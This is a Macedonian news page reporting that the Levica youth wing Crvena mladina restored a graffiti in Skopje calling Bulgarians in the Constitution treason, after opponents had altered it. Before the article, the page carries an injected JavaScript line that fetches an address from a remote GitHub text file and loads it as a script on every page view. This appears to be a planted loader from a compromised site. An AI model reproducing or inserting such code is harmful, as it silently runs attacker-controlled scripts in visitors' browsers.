;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Видео) Црвена младина го врати графитот „Бугарите во Устав е предавство“ - Антропол
АктуелноЛокално

(Видео) Црвена младина го врати графитот „Бугарите во Устав е предавство“

Активисти на подмладокот на Левица, Црвена младина, повторно го вратија графитот „Бугари во Устав е предавство“ испишан на кејот на реката Вардар во Скопје.

Откако неодамна графитот беше изменет да гласи „Бугари во Устав“ и со бугарско знаме нацртано наместо „е предавство“, сега повторно е вратен во првобитната состојба во пресрет на големиот празник 13-ти Ноември – Ден на ослободувањето на Скопје од нацистичко-фашистичката окупација.

Од Црвена младина велат дека „ако треба уште 100 пати ќе дојдат“ за овој графит да стои во својата оригинална форма.

Графитот беше направен во април годинава, а осквернавен од бугарофили на 5 ноември.